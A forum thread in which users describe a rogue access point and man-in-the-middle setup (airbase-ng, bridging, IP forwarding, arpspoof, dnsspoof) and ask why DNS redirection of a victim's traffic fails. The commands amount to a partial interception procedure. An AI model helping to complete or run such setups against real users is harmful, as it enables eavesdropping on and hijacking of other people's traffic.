Jump to content

Dnsspoof not redirecting websites


forstbyte

Recommended Posts

Hello ,

i am currently working on MITM attacks and i am trying to redirect websites to my computer through dnsspoof and the problem is that ,although it is picking up traffic and i can see it registers all sites the victim is visiting , it is still letting the victim connect to the website instead of redirecting it to me.

Here is a my procedure:

-firstly i created a mon0 interface form wlan0 wireless card

-i started up my access point [ airbase-ng --essid mitm -c 11 mon0 ]

-then i created a bridge between at0 and eth0 :

brctl addbr mitm-bridge

brctl addif mitm-bridge eth0

brctl addif mitm-bridge at0

ifconfig eth0 0.0.0.0 up

ifconfig at0 0.0.0.0 up

-then i went into [ ifconfig ] to see my ip ( lets say it is 150.150.1.1 ) and did :

ifconfig mitm-bridge 150.150.1.1 up

-so now my machine and the bridge have the same ip

-then i did ip forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

-i connected the victim to the airbase-ng and everything was fine .The traffic was going through and there was no problem.

-then i did:

dnsspoof -i mitm-bridge

-it started and when i went to google.com on the victim machine it didnt reroute it.It just went to google.com

-when it connected to google.com it showed :

192.168.1.13 .<some random 5 digit number> > 192.186.1.1.53 A? google.com

-from where i was getting my information about dnsspoof it showed that instead of the 192.168.1.13 ( the ip of the victim device ) should be 150.150.1.1 ( attacking device ) and it was stated that the connection would be refused but it wasnt!

Please help me!

I am trying to figure this out for a week now...

Good day!

Link to comment
Share on other sites

I am having the same problem man.

I didnt bridge anything.

I go arpsoof and its working .

Then ip_forward and its all ok . But then i do sudo dnsspoof -i wlan0 -f myresolver.txt which is the file i have all the redirections.

192.168.0.11.7020 > 217.16.112.21.53: 63814+ A? www.youtube.com

192.168.0.11.7020 > 217.16.112.21.53: 63814+ A? www.youtube.com

this is what i get and nothing happens it just goes to youtube.

Why is this happening i am doing everything .

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...